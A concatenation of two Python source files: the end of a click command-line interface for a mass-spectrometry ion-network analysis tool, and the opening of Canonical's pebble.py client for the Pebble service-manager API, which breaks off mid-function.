@click.option(
"--input_path",
"-i",
help="A unified [input.inet.csv] file with centroided ion peaks. "
"Columns with headers PRECURSOR_RT, FRAGMENT_MZ and "
"FRAGMENT_LOGINT always need to be present. "
"All columns whose header start with # are not interpreted as ion "
"coordinates but as comments such as e.g. prior annotations. "
"All other columns (e.g. PRECURSOR_MZ or PRECURSOR_DT) are "
"automatically interpreted as dimensions with ion coordinates. "
"All PRECURSOR_* dimensions are used to create edges between ions. "
"Individual files can be provided, as well as folders. "
"This flag can be set multiple times.",
multiple=True,
required=True,
type=click.Path(exists=True)
)
@click.option(
"--output_directory",
"-o",
help="For each [input.inet.csv] file, an [input.inet.hdf] ion-network "
"file is created. "
"If no output directory is provided, each [input.inet.hdf] file is "
"placed in the same folder as its corresponding [input.inet.csv] "
"file. "
"This output directory can also be supplied through a "
"[parameters.json] file. "
"WARNING: This overrides already existing files without "
"confirmation.",
type=click.Path(file_okay=False)
)
@click.option(
"--parameter_file",
"-p",
"parameter_file_name",
help="A [parameters.json] file with optional parameters.",
type=click.Path(exists=True, dir_okay=False)
)
@click.option(
"--log_file",
"-l",
"log_file_name",
help="Save the log to a [log.txt] file. "
"By default this is written to the current directory. "
"This log file can also be supplied through a [parameters.json] "
"file. It can be turned off by providing an empty path (i.e. ''). "
"If the log file already exists, the new log data is appended.",
type=click.Path()
)
@click.option(
"--threads",
"-t",
"threads",
help="The number of threads to use.",
type=int
)
def create(
input_path,
output_directory,
parameter_file_name,
log_file_name,
threads
):
create_ion_networks(
input_path,
output_directory,
parameter_file_name,
log_file_name,
threads
)
@staticmethod
@click.command(
"evidence",
help="Collect pairwise evidence for [input.inet.hdf] ion-network files "
"as [input.evidence.hdf] evidence files.",
short_help="Collect evidence for ion-networks."
)
@click.option(
"--input_path",
"-i",
help="An [input.inet.hdf] ion-network file."
"Individual files can be provided, as well as folders. "
"This flag can be set multiple times.",
required=True,
multiple=True,
type=click.Path(exists=True)
)
@click.option(
"--parameter_file",
"-p",
"parameter_file_name",
help="A [parameters.json] file with optional parameters.",
type=click.Path(exists=True, dir_okay=False)
)
@click.option(
"--log_file",
"-l",
"log_file_name",
help="Save the log to a [log.txt] file. "
"By default this is written to the current directory. "
"This log file can also be supplied through a [parameters.json] "
"file. It can be turned off by providing an empty path (i.e. ''). "
"If the log file already exists, the new log data is appended.",
type=click.Path()
)
@click.option(
"--threads",
"-t",
"threads",
help="The number of threads to use.",
type=int
)
def evidence(
input_path,
parameter_file_name,
log_file_name,
threads
):
evidence_ion_networks(
input_path,
parameter_file_name,
log_file_name,
threads
)
@staticmethod
# TODO: Implement
@click.command(
"show",
help="Show and browse ion-networks and their evidence.",
short_help="Show and browse ion-networks."
)
@click.option(
"--parameter_file",
"-p",
"parameter_file_name",
help="A [parameters.json] file with optional parameters.",
type=click.Path(exists=True, dir_okay=False)
)
@click.option(
"--log_file",
"-l",
"log_file_name",
help="Save the log to a [log.txt] file. "
"By default this is written to the current directory. "
"This log file can also be supplied through a [parameters.json] "
"file. It can be turned off by providing an empty path (i.e. ''). "
"If the log file already exists, the new log data is appended.",
type=click.Path()
)
def show(
parameter_file_name,
log_file_name
):
show_ion_network(
parameter_file_name,
log_file_name
)
@staticmethod
@click.command(
"gui",
help="Graphical user interface to analyse ion-networks.",
)
def gui():
run_ion_network_gui()
@staticmethod
@click.command(
"database",
help="Create a [database.hdf] from fasta files.",
short_help="Create database from fasta files."
)
@click.option(
"--input_path",
"-i",
help="A fasta file with protein sequences. "
"Individual files can be provided, as well as folders. "
"This flag can be set multiple times.",
multiple=True,
required=True,
type=click.Path(exists=True)
)
@click.option(
"--output_directory",
"-o",
help="The output directory fot the database. The file name is "
"automatically set as a concatenation of the input fasta files, "
"potentially appedned with _concatenated_decoy. "
"This output directory can also be supplied through a "
"[parameters.json] file. "
"WARNING: This overrides already existing files without "
"confirmation.",
type=click.Path(file_okay=False)
)
@click.option(
"--parameter_file",
"-p",
"parameter_file_name",
help="A [parameters.json] file with optional parameters.",
type=click.Path(exists=True, dir_okay=False)
)
@click.option(
"--log_file",
"-l",
"log_file_name",
help="Save the log to a [log.txt] file. "
"By default this is written to the current directory. "
"This log file can also be supplied through a [parameters.json] "
"file. It can be turned off by providing an empty path (i.e. ''). "
"If the log file already exists, the new log data is appended.",
type=click.Path()
)
@click.option(
"--threads",
"-t",
"threads",
help="The number of threads to use.",
type=int
)
def database(
input_path,
output_directory,
parameter_file_name,
log_file_name,
threads
):
create_database(
input_path,
output_directory,
parameter_file_name,
log_file_name,
threads
)
@staticmethod
@click.command(
"annotate",
help="Annotate ion-network files.",
short_help="Annotate ion-network files."
)
@click.option(
"--input_path",
"-i",
help="An [input.evidence.hdf] evidence file. "
"Individual files can be provided, as well as folders. "
"This flag can be set multiple times.",
required=True,
multiple=True,
type=click.Path(exists=True)
)
@click.option(
"--database_file",
"-d",
"database_file_name",
help="A [database.hdf] file.",
required=True,
type=click.Path(exists=True, dir_okay=False),
)
@click.option(
'--mgf_format',
'-m',
'mgf_format',
help="Input is in mgf format",
is_flag=True,
default=False,
show_default=True,
)
@click.option(
"--parameter_file",
"-p",
"parameter_file_name",
help="A [parameters.json] file with optional parameters.",
type=click.Path(exists=True, dir_okay=False)
)
@click.option(
"--log_file",
"-l",
"log_file_name",
help="Save the log to a [log.txt] file. "
"By default this is written to the current directory. "
"This log file can also be supplied through a [parameters.json] "
"file. It can be turned off by providing an empty path (i.e. ''). "
"If the log file already exists, the new log data is appended.",
type=click.Path()
)
@click.option(
"--threads",
"-t",
"threads",
help="The number of threads to use.",
type=int
)
@click.option(
"--fragment_ppm_error",
"-e",
"fragment_ppm_error",
help="The maximum allowed fragment ppm error.",
type=float
)
@click.option(
"--export_decoys",
"-x",
"export_decoys",
help="Include decoy hits in the export.",
is_flag=True,
default=False,
show_default=True,
)
@click.option(
"--fdr_filter",
"-f",
"fdr_filter",
help="Remove annotations above this fdr.",
type=float
)
@click.option(
"--align_to_database",
"-c",
"align_to_database",
help="Align to database",
is_flag=True,
default=True,
show_default=True,
)
def annotate(
input_path,
database_file_name,
mgf_format,
parameter_file_name,
log_file_name,
threads,
fragment_ppm_error,
export_decoys,
fdr_filter,
align_to_database,
):
annotate(
input_path,
database_file_name,
mgf_format,
parameter_file_name,
log_file_name,
threads,
fragment_ppm_error,
export_decoys,
fdr_filter,
align_to_database
)
@staticmethod
@click.command(
"mgf",
help="Create [input.MGF] ion-network files from evidence "
"[input.evidence.hdf] files.",
short_help="Create mgf files from evidence."
)
@click.option(
"--input_path",
"-i",
help="An evidence [input.evidence.hdf] file. "
"Individual files can be provided, as well as folders. "
"This flag can be set multiple times.",
multiple=True,
required=True,
type=click.Path(exists=True)
)
@click.option(
"--output_directory",
"-o",
help="For each [input.evidence.hdf] file, an [input.mgf] "
"file is created. "
"If no output directory is provided, each [input.mgf] file is "
"placed in the same folder as its corresponding "
"[input.evidence.hdf] file. "
"This output directory can also be supplied through a "
"[parameters.json] file. "
"WARNING: This overrides already existing files without "
"confirmation.",
type=click.Path(file_okay=False)
)
@click.option(
"--parameter_file",
"-p",
"parameter_file_name",
help="A [parameters.json] file with optional parameters.",
type=click.Path(exists=True, dir_okay=False)
)
@click.option(
"--log_file",
"-l",
"log_file_name",
help="Save the log to a [log.txt] file. "
"By default this is written to the current directory. "
"This log file can also be supplied through a [parameters.json] "
"file. It can be turned off by providing an empty path (i.e. ''). "
"If the log file already exists, the new log data is appended.",
type=click.Path()
)
def mgf(
input_path,
output_directory,
parameter_file_name,
log_file_name
):
create_mgfs(
input_path,
output_directory,
parameter_file_name,
log_file_name
)
# TODO: Rename "unified" and "peaks" referring to .inet.csv files?
# TODO: Define help text in separate json files?
# TODO: Show help text popups in GUI
# TODO: Database interface (CLI + GUI)
# TODO: Annotation interface (CLI + GUI)
# -pRawDirName ~/sandbox/HDMSE_test/171114_HDMSE_Mclass_K562_30min_01.raw -outputDirName ~/sandbox/HDMSE_test/ -lockMassZ2 785.8426 -lockmassToleranceAMU 0.25 -bCSVOutput 1 -writeFuncCsvFiles 0 -leThresholdCounts 1 -heThresholdCounts 1 -apexTrackSNRThreshold 1 -bEnableCentroids 0
|
pebble.py | # Copyright 2021 Canonical Ltd.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Client for the Pebble API (HTTP over Unix socket).
For a command-line interface for local testing, see test/pebble_cli.py.
"""
import binascii
import cgi
import datetime
import email.parser
import enum
import http.client
import io
import json
import logging
import os
import re
import select
import shutil
import signal
import socket
import sys
import threading
import time
import typing
import urllib.error
import urllib.parse
import urllib.request
import warnings
from ops._private import yaml
from ops._vendor import websocket
logger = logging.getLogger(__name__)
_not_provided = object()
class _UnixSocketConnection(http.client.HTTPConnection):
"""Implementation of HTTPConnection that connects to a named Unix socket."""
def __init__(self, host, timeout=_not_provided, socket_path=None):
if timeout is _not_provided:
super().__init__(host)
else:
super().__init__(host, timeout=timeout)
self.socket_path = socket_path
def connect(self):
"""Override connect to use Unix socket (instead of TCP socket)."""
if not hasattr(socket, 'AF_UNIX'):
raise NotImplementedError('Unix sockets not supported on {}'.format(sys.platform))
self.sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
self.sock.connect(self.socket_path)
if self.timeout is not _not_provided:
self.sock.settimeout(self.timeout)
class _UnixSocketHandler(urllib.request.AbstractHTTPHandler):
"""Implementation of HTTPHandler that uses a named Unix socket."""
def __init__(self, socket_path):
super().__init__()
self.socket_path = socket_path
def http_open(self, req):
"""Override http_open to use a Unix socket connection (instead of TCP)."""
return self.do_open(_UnixSocketConnection, req, socket_path=self.socket_path)
# Matches yyyy-mm-ddTHH:MM:SS(.sss)ZZZ
_TIMESTAMP_RE = re.compile(
r'(\d{4})-(\d{2})-(\d{2})[Tt](\d{2}):(\d{2}):(\d{2})(\.\d+)?(.*)')
# Matches [-+]HH:MM
_TIMEOFFSET_RE = re.compile(r'([-+])(\d{2}):(\d{2})')
def _parse_timestamp(s):
"""Parse timestamp from Go-encoded JSON.
This parses RFC3339 timestamps (which are a subset of ISO8601 timestamps)
that Go's encoding/json package produces for time.Time values.
Unfortunately we can't use datetime.fromisoformat(), as that does not
support more than 6 digits for the fractional second, nor the 'Z' for UTC.
Also, it was only introduced in Python 3.7.
"""
match = _TIMESTAMP_RE.match(s)
if not match:
raise ValueError('invalid timestamp {!r}'.format(s))
y, m, d, hh, mm, ss, sfrac, zone = match.groups()
if zone in ('Z', 'z'):
tz = datetime.timezone.utc
else:
match = _TIMEOFFSET_RE.match(zone)
if not match:
raise ValueError('invalid timestamp {!r}'.format(s))
sign, zh, zm = match.groups()
tz_delta = datetime.timedelta(hours=int(zh), minutes=int(zm))
tz = datetime.timezone(tz_delta if sign == '+' else -tz_delta)
microsecond = round(float(sfrac or '0') * 1000000)
return datetime.datetime(int(y), int(m), int(d), int(hh), int(mm), int(ss),
microsecond=microsecond, tzinfo=tz)
def _format_timeout(timeout: float):
"""Format timeout for use in the Pebble API.
The format is in seconds with a millisecond resolution and an 's' suffix,
as accepted by the Pebble API (which uses Go's time.ParseDuration).
"""
return '{:.3f}s'.format(timeout)
def _json_loads(s: typing.Union[str, bytes]) -> typing.Dict:
"""Like json.loads(), but handle str or bytes.
This is needed because an HTTP response's read() method returns bytes on
Python 3.5, and json.load doesn't handle bytes.
"""
if isinstance(s, bytes):
s = s.decode('utf-8')
return json.loads(s)
def _start_thread(target, *args, **kwargs) -> threading.Thread:
"""Helper to simplify starting a thread."""
thread = threading.Thread(target=target, args=args, kwargs=kwargs)
thread.start()
return thread
class Error(Exception):
"""Base class of most errors raised by the Pebble client."""
def __repr__(self):
return '<{}.{} {}>'.format(type(self).__module__, type(self).__name__, self.args)
def name(self):
"""Return a string representation of the model plus class."""
return '<{}.{}>'.format(type(self).__module__, type(self).__name__)
def message(self):
"""Return the message passed as an argument."""
return self.args[0]
class TimeoutError(TimeoutError, Error):
"""Raised when a polling timeout occurs."""
class ConnectionError(Error):
"""Raised when the Pebble client can't connect to the socket."""
class ProtocolError(Error):
"""Raised when there's a higher-level protocol error talking to Pebble."""
class PathError(Error):
"""Raised when there's an error with a specific path."""
def __init__(self, kind: str, message: str):
"""This shouldn't be instantiated directly."""
self.kind = kind
self.message = message
def __str__(self):
return '{} - {}'.format(self.kind, self.message)
def __repr__(self):
return 'PathError({!r}, {!r})'.format(self.kind, self.message)
class APIError(Error):
"""Raised when an HTTP API error occurs talking to the Pebble server."""
def __init__(self, body: typing.Dict, code: int, status: str, message: str):
"""This shouldn't be instantiated directly."""
super().__init__(message) # Makes str(e) return message
self.body = body
self.code = code
self.status = status
self.message = message
def __repr__(self):
return 'APIError({!r}, {!r}, {!r}, {!r})'.format(
self.body, self.code, self.status, self.message)
class ChangeError(Error):
"""Raised by actions when a change is ready but has an error.
For example, this happens when you attempt to start an already-started
service:
cannot perform the following tasks:
- Start service "test" (service "test" was previously started)
"""
def __init__(self, err: str, change: 'Change'):
"""This shouldn't be instantiated directly."""
self.err = err
self.change = change
def __str__(self):
parts = [self.err]
# Append any task logs to the error message
for i, task in enumerate(self.change.tasks):
if not task.log:
continue
parts.append('\n----- Logs from task {} -----\n'.format(i))
parts.append('\n'.join(task.log))
if len(parts) > 1:
parts.append('\n-----')
return ''.join(parts)
def __repr__(self):
return 'ChangeError({!r}, {!r})'.format(self.err, self.change)
class ExecError(Error):
"""Raised when a :meth:`Client.exec` command returns a non-zero exit code.
Attributes:
command: Command line of command being executed.
exit_code: The process's exit code. This will always be non-zero.
stdout: If :meth:`ExecProcess.wait_output` was being called, this is
the captured stdout as a str (or bytes if encoding was None). If
:meth:`ExecProcess.wait` was being called, this is None.
stderr: If :meth:`ExecProcess.wait_output` was being called and
combine_stderr was False, this is the captured stderr as a str (or
bytes if encoding was None). If :meth:`ExecProcess.wait` was being
called or combine_stderr was True, this is None.
"""
STR_MAX_OUTPUT = 1024
def __init__(
self,
command: typing.List[str],
exit_code: int,
stdout: typing.Optional[typing.AnyStr],
stderr: typing.Optional[typing.AnyStr],
):
self.command = command
self.exit_code = exit_code
self.stdout = stdout
self.stderr = stderr
def __str__(self):
message = 'non-zero exit code {} executing {!r}'.format(
self.exit_code, self.command)
for name, out in [('stdout', self.stdout), ('stderr', self.stderr)]:
if out is None:
continue
truncated = ' [truncated]' if len(out) > self.STR_MAX_OUTPUT else ''
out = out[:self.STR_MAX_OUTPUT]
message = '{}, {}={!r}{}'.format(message, name, out, truncated)
return message
class WarningState(enum.Enum):
"""Enum of states for get_warnings() select parameter."""
ALL = 'all'
PENDING = 'pending'
class ChangeState(enum.Enum):
"""Enum of states for get_changes() select parameter."""
ALL = 'all'
IN_PROGRESS = 'in-progress'
READY = 'ready'
class SystemInfo:
"""System information object."""
def __init__(self, version: str):
self.version = version
@classmethod
def from_dict(cls, d: typing.Dict) -> 'SystemInfo':
"""Create new SystemInfo object from dict parsed from JSON."""
return cls(version=d['version'])
def __repr__(self):
return 'SystemInfo(version={self.version!r})'.format(self=self)
class Warning:
"""Warning object."""
def __init__(
self,
message: str,
first_added: datetime.datetime,
last_added: datetime.datetime,
last_shown: typing.Optional[datetime.datetime],
expire_after: str,
repeat_after: str,
):
self.message = message
self.first_added = first_added
self.last_added = last_added
self.last_shown = last_shown
self.expire_after = expire_after
self.repeat_after = repeat_after
@classmethod
def from_dict(cls, d: typing.Dict) -> 'Warning':
"""Create new Warning object from dict parsed from JSON."""
return cls(
message=d['message'],
first_added=_parse_timestamp(d['first-added']),
last_added=_parse_timestamp(d['last-added']),
last_shown=_parse_timestamp(d['last-shown']) if d.get('last-shown') else None,
expire_after=d['expire-after'],
repeat_after=d['repeat-after'],
)
def __repr__(self):
return ('Warning('
'message={self.message!r}, '
'first_added={self.first_added!r}, '
'last_added={self.last_added!r}, '
'last_shown={self.last_shown!r}, '
'expire_after={self.expire_after!r}, '
'repeat_after={self.repeat_after!r})'
).format(self=self)
class TaskProgress:
"""Task progress object."""
def __init__(
self,
label: str,
done: int,
total: int,
):
self.label = label
self.done = done
self.total = total
@classmethod
def from_dict(cls, d: typing.Dict) -> 'TaskProgress':
"""Create new TaskProgress object from dict parsed from JSON."""
return cls(
label=d['label'],
done=d['done'],
total=d['total'],
)
def __repr__(self):
return ('TaskProgress('
'label={self.label!r}, '
'done={self.done!r}, '
'total={self.total!r})'
).format(self=self)
class TaskID(str):
"""Task ID (a more strongly-typed string)."""
def __repr__(self):
return 'TaskID({!r})'.format(str(self))
class Task:
"""Task object."""
def __init__(
self,
id: TaskID,
kind: str,
summary: str,
status: str,
log: typing.List[str],
progress: TaskProgress,
spawn_time: datetime.datetime,
ready_time: typing.Optional[datetime.datetime],
data: typing.Dict[str, typing.Any] = None,
):
self.id = id
self.kind = kind
self.summary = summary
self.status = status
self.log = log
self.progress = progress
self.spawn_time = spawn_time
self.ready_time = ready_time
self.data = data or {}
@classmethod
def from_dict(cls, d: typing.Dict) -> 'Task':
"""Create new Task object from dict parsed from JSON."""
return cls(
id=TaskID(d['id']),
kind=d['kind'],
summary=d['summary'],
status=d['status'],
log=d.get('log') or [],
progress=TaskProgress.from_dict(d['progress']),
spawn_time=_parse_timestamp(d['spawn-time']),
ready_time=_parse_timestamp(d['ready-time']) if d.get('ready-time') else None,
data=d.get('data') or {},
)
def __repr__(self):
return ('Task('
'id={self.id!r}, '
'kind={self.kind!r}, '
'summary={self.summary!r}, '
'status={self.status!r}, '
'log={self.log!r}, '
'progress={self.progress!r}, '
'spawn_time={self.spawn_time!r}, '
'ready_time={self.ready_time!r}, '
'data={self.data!r})'
).format(self=self)
class ChangeID(str):
"""Change ID (a more strongly-typed string)."""
def __repr__(self):
return 'ChangeID({!r})'.format(str(self))
class Change:
"""Change object."""
def __init__(
self,
id: ChangeID,
kind: str,
summary: str,
status: str,
tasks: typing.List[Task],
ready: bool,
err: typing.Optional[str],
spawn_time: datetime.datetime,
ready_time: typing.Optional[datetime.datetime],
data: typing.Dict[str, typing.Any] = None,
):
self.id = id
self.kind = kind
self.summary = summary
self.status = status
self.tasks = tasks
self.ready = ready
self.err = err
self.spawn_time = spawn_time
self.ready_time = ready_time
self.data = data or {}
@classmethod
def from_dict(cls, d: typing.Dict) -> 'Change':
"""Create new Change object from dict parsed from JSON."""
return cls(
id=ChangeID(d['id']),
kind=d['kind'],
summary=d['summary'],
status=d['status'],
tasks=[Task.from_dict(t) for t in d.get('tasks') or []],
ready=d['ready'],
err=d.get('err'),
spawn_time=_parse_timestamp(d['spawn-time']),
ready_time=_parse_timestamp(d['ready-time']) if d.get('ready-time') else None,
data=d.get('data') or {},
)
def __repr__(self):
return ('Change('
'id={self.id!r}, '
'kind={self.kind!r}, '
'summary={self.summary!r}, '
'status={self.status!r}, '
'tasks={self.tasks!r}, '
'ready={self.ready!r}, '
'err={self.err!r}, '
'spawn_time={self.spawn_time!r}, '
'ready_time={self.ready_time!r}, '
'data={self.data!r})'
).format(self=self)
class Plan:
"""Represents the effective Pebble configuration."""
def __init__(self, raw: str):
d = yaml.safe_load(raw) or {}
self._raw = raw
self._services = {name: Service(name, service)
for name, service in d.get('services', {}).items()}
@property
def services(self):
"""This plan's services mapping (maps service name to Service).
This property is currently read-only.
"""
return self._services
def to_dict(self) -> typing.Dict[str, typing.Any]:
"""Convert this plan to its dict representation."""
as_dicts = {name: service.to_dict() for name, service in self._services.items()}
if not as_dicts:
return {}
return {
'services': as_dicts,
}
def to_yaml(self) -> str:
"""Return this plan's YAML representation."""
return yaml.safe_dump(self.to_dict())
__str__ = to_yaml
class Layer:
"""Represents a Pebble configuration layer.
The format of this is not documented, but is captured in code here:
https://github.com/canonical/pebble/blob/master/internal/plan/plan.go
Attributes:
summary: A summary of the purpose of this layer
description: A long form description of this layer
services: A mapping of name: :class:`Service` defined by this layer
"""
# This is how you do type annotations, but it is not supported by Python 3.5
# summary: str
# description: str
# services: typing.Mapping[str, 'Service']
def __init__(self, raw: typing.Union[str, typing.Dict] = None):
if isinstance(raw, str):
d = yaml.safe_load(raw) or {}
else:
d = raw or {}
self.summary = d.get('summary', '')
self.description = d.get('description', '')
self.services = {name: Service(name, service)
for name, service in d.get('services', {}).items()}
def to_yaml(self) -> str:
"""Convert this layer to its YAML representation."""
return yaml.safe_dump(self.to_dict())
def to_dict(self) -> typing.Dict[str, typing.Any]:
"""Convert this layer to its dict representation."""
fields = [
('summary', self.summary),
('description', self.description),
('services', {name: service.to_dict() for name, service in self.services.items()})
]
return {name: value for name, value in fields if value}
def __repr__(self) -> str:
return 'Layer({!r})'.format(self.to_dict())
__str__ = to_yaml
class Service:
"""Represents a service description in a Pebble configuration layer."""
def __init__(self, name: str, raw: typing.Dict = None):
self.name = name
raw = raw or {}
self.summary = raw.get('summary', '')
self.description = raw.get('description', '')
self.startup = raw.get('startup', '')
self.override = raw.get('override', '')
self.command = raw.get('command', '')
self.after = list(raw.get('after', []))
self.before = list(raw.get('before', []))
self.requires = list(raw.get('requires', []))
self.environment = dict(raw.get('environment', {}))
self.user = raw.get('user', '')
self.user_id = raw.get('user-id')
self.group = raw.get('group', '')
self.group_id = raw.get('group-id')
def to_dict(self) -> typing.Dict:
"""Convert this service object to its dict representation."""
fields = [
('summary', self.summary),
('description', self.description),
('startup', self.startup),
('override', self.override),
('command', self.command),
('after', self.after),
('before', self.before),
('requires', self.requires),
('environment', self.environment),
('user', self.user),
('user-id', self.user_id),
('group', self.group),
('group-id', self.group_id),
]
return {name: value for name, value in fields if value}
def __repr__(self) -> str:
return 'Service({!r})'.format(self.to_dict())
def __eq__(self, other: typing.Union[typing.Dict, 'Service']) -> bool:
"""Compare this service description to another."""
if isinstance(other, dict):
return self.to_dict() == other
elif isinstance(other, Service):
return self.to_dict() == other.to_dict()
else:
raise ValueError(
"Cannot compare pebble.Service to {}".format(type(other))
)
class ServiceStartup(enum.Enum):
"""Enum of service startup options."""
ENABLED = 'enabled'
DISABLED = 'disabled'
class ServiceStatus(enum.Enum):
"""Enum of service statuses."""
ACTIVE = 'active'
INACTIVE = 'inactive'
ERROR = 'error'
class ServiceInfo:
"""Service status information."""
def __init__(
self,
name: str,
startup: typing.Union[ServiceStartup, str],
current: typing.Union[ServiceStatus, str],
):
self.name = name
self.startup = startup
self.current = current
def is_running(self) -> bool:
"""Return True if this service is running (in the active state)."""
return self.current == ServiceStatus.ACTIVE
@classmethod
def from_dict(cls, d: typing.Dict) -> 'ServiceInfo':
"""Create new ServiceInfo object from dict parsed from JSON."""
try:
startup = ServiceStartup(d['startup'])
except ValueError:
startup = d['startup']
try:
current = ServiceStatus(d['current'])
except ValueError:
current = d['current']
return cls(
name=d['name'],
startup=startup,
current=current,
)
def __repr__(self):
return ('ServiceInfo('
'name={self.name!r}, '
'startup={self.startup}, '
'current={self.current})'
).format(self=self)
class FileType(enum.Enum):
"""Enum of file types."""
FILE = 'file'
DIRECTORY = 'directory'
SYMLINK = 'symlink'
SOCKET = 'socket'
NAMED_PIPE = 'named-pipe'
DEVICE = 'device'
UNKNOWN = 'unknown'
class FileInfo:
"""Stat-like information about a single file or directory."""
def __init__(
self,
path: str,
name: str,
type: typing.Union['FileType', str],
size: typing.Optional[int],
permissions: int,
last_modified: datetime.datetime,
user_id: typing.Optional[int],
user: typing.Optional[str],
group_id: typing.Optional[int],
group: typing.Optional[str],
):
self.path = path
self.name = name
self.type = type
self.size = size
self.permissions = permissions
self.last_modified = last_modified
self.user_id = user_id
self.user = user
self.group_id = group_id
self.group = group
@classmethod
def from_dict(cls, d: typing.Dict) -> 'FileInfo':
"""Create new FileInfo object from dict parsed from JSON."""
try:
file_type = FileType(d['type'])
except ValueError:
file_type = d['type']
return cls(
path=d['path'],
name=d['name'],
type=file_type,
size=d.get('size'),
permissions=int(d['permissions'], 8),
last_modified=_parse_timestamp(d['last-modified']),
user_id=d.get('user-id'),
user=d.get('user'),
group_id=d.get('group-id'),
group=d.get('group'),
)
def __repr__(self):
return ('FileInfo('
'path={self.path!r}, '
'name={self.name!r}, '
'type={self.type}, '
'size={self.size}, '
'permissions=0o{self.permissions:o}, '
'last_modified={self.last_modified!r}, '
'user_id={self.user_id}, '
'user={self.user!r}, '
'group_id={self.group_id}, '
'group={self.group!r})'
).format(self=self)
class ExecProcess:
"""Represents a process started by :meth:`Client.exec`.
To avoid deadlocks, most users should use :meth:`wait_output` instead of
reading and writing the :attr:`stdin`, :attr:`stdout`, and :attr:`stderr`
attributes directly. Alternatively, users can pass stdin/stdout/stderr to
:meth:`Client.exec`.
This class should not be instantiated directly, only via
:meth:`Client.exec`.
Attributes:
stdin: If the stdin argument was not passed to :meth:`Client.exec`,
this is a writable file-like object the caller can use to stream
input to the process. It is None if stdin was passed to
:meth:`Client.exec`.
stdout: If the stdout argument was not passed to :meth:`Client.exec`,
this is a readable file-like object the caller can use to stream
output from the process. It is None if stdout was passed to
:meth:`Client.exec`.
stderr: If the stderr argument was not passed to :meth:`Client.exec`
and combine_stderr was False, this is a readable file-like object
the caller can use to stream error output from the process. It is
None if stderr was passed to :meth:`Client.exec` or combine_stderr
was True.
"""
def __init__(
self,
stdin: typing.Optional[typing.Union[typing.TextIO, typing.BinaryIO]],
stdout: typing.Optional[typing.Union[typing.TextIO, typing.BinaryIO]],
stderr: typing.Optional[typing.Union[typing.TextIO, typing.BinaryIO]],
client: 'Client',
timeout: typing.Optional[float],
control_ws: websocket.WebSocket,
stdio_ws: websocket.WebSocket,
stderr_ws: websocket.WebSocket,
command: typing.List[str],
encoding: typing.Optional[str],
change_id: ChangeID,
cancel_stdin: typing.Callable[[], None],
cancel_reader: typing.Optional[int],
threads: typing.List[threading.Thread],
):
self.stdin = stdin
self.stdout = stdout
self.stderr = stderr
self._client = client
self._timeout = timeout
self._control_ws = control_ws
self._stdio_ws = stdio_ws
self._stderr_ws = stderr_ws
self._command = command
self._encoding = encoding
self._change_id = change_id
self._cancel_stdin = cancel_stdin
self._cancel_reader = cancel_reader
self._threads = threads
self._waited = False
def __del__(self):
if not self._waited:
msg = 'ExecProcess instance garbage collected without call to wait() or wait_output()'
warnings.warn(msg, ResourceWarning)
def wait(self):
"""Wait for the process to finish.
If a timeout was specified to the :meth:`Client.exec` call, this waits
at most that duration.
Raises:
ChangeError: if there was an error starting or running the process.
ExecError: if the process exits with a non-zero exit code.
"""
exit_code = self._wait()
if exit_code != 0:
raise ExecError(self._command, exit_code, None, None)
def _wait(self):
self._waited = True
timeout = self._timeout
if timeout is not None:
# A bit more than the command timeout to ensure that happens first
timeout += 1
change = self._client.wait_change(self._change_id, timeout=timeout)
# If stdin reader thread is running, stop it
if self._cancel_stdin is not None:
self._cancel_stdin()
# Wait for all threads to finish (e.g., message barrier sent)
for thread in self._threads:
thread.join()
# If we opened a cancel_reader pipe, close the read side now (write
# side was already closed by _cancel_stdin().
if self._cancel_reader is not None:
os.close(self._cancel_reader)
# Close websockets (shutdown doesn't send CLOSE message or wait for response).
self._control_ws.shutdown()
self._stdio_ws.shutdown()
if self._stderr_ws is not None:
self._stderr_ws.shutdown()
if change.err:
raise ChangeError(change.err, change)
exit_code = -1
if change.tasks:
exit_code = change.tasks[0].data.get('exit-code', -1)
return exit_code
def wait_output(self) -> typing.Tuple[typing.AnyStr, typing.AnyStr]:
"""Wait for the process to finish and return tuple of (stdout, stderr).
If a timeout was specified to the :meth:`Client.exec` call, this waits
at most that duration. If combine_stderr was True, stdout will include
the process's standard error, and stderr will be None.
Raises:
ChangeError: if there was an error starting or running the process.
ExecError: if the process exits with a non-zero exit code.
"""
if self._encoding is not None:
out = io.StringIO()
err = io.StringIO() if self.stderr is not None else None
else:
out = io.BytesIO()
err = io.BytesIO() if self.stderr is not None else None
t = _start_thread(shutil.copyfileobj, self.stdout, out)
self._threads.append(t)
if self.stderr is not None:
t = _start_thread(shutil.copyfileobj, self.stderr, err)
self._threads.append(t)
exit_code = self._wait()
out_value = out.getvalue()
err_value = err.getvalue() if err is not None else None
if exit_code != 0:
raise ExecError(self._command, exit_code, out_value, err_value)
return (out_value, err_value)
def send_signal(self, sig: typing.Union[int, str]):
"""Send the given signal to the running process.
Args:
sig: Name or number of signal to send, e.g., "SIGHUP", 1, or
signal.SIGHUP.
"""
if isinstance(sig, int):
sig = signal.Signals(sig).name
payload = {
'command': 'signal',
'signal': {'name': sig},
}
msg = json.dumps(payload, sort_keys=True)
self._control_ws.send(msg)
def _has_fileno(f):
"""Return True if the file-like object has a valid fileno() method."""
try:
f.fileno()
return True
except Exception:
# Some types define a fileno method that raises io.UnsupportedOperation,
# but just catching all exceptions here won't hurt.
return False
def _reader_to_websocket(reader, ws, encoding, cancel_reader=None, bufsize=16 * 1024):
"""Read reader through to EOF and send each chunk read to the websocket."""
while True:
if cancel_reader is not None:
# Wait for either a read to be ready or the caller to cancel stdin
result = select.select([cancel_reader, reader], [], [])
if cancel_reader in result[0]:
break
chunk = reader.read(bufsize)
if not chunk:
break
if isinstance(chunk, str):
chunk = chunk.encode(encoding)
ws.send_binary(chunk)
ws.send('{"command":"end"}') # Send "end" command as TEXT frame to signal EOF
def _websocket_to_writer(ws, writer, encoding):
"""Receive messages from websocket (until end signal) and write to writer."""
while True:
chunk = ws.recv()
if isinstance(chunk, str):
try:
payload = json.loads(chunk)
except ValueError:
# Garbage sent, try to keep going
logger.warning('Cannot decode I/O command (invalid JSON)')
continue
command = payload.get('command')
if command != 'end':
# A command we don't recognize, keep going
logger.warning('Invalid I/O command {!r}'.format(command))
continue
# Received "end" command (EOF signal), stop thread
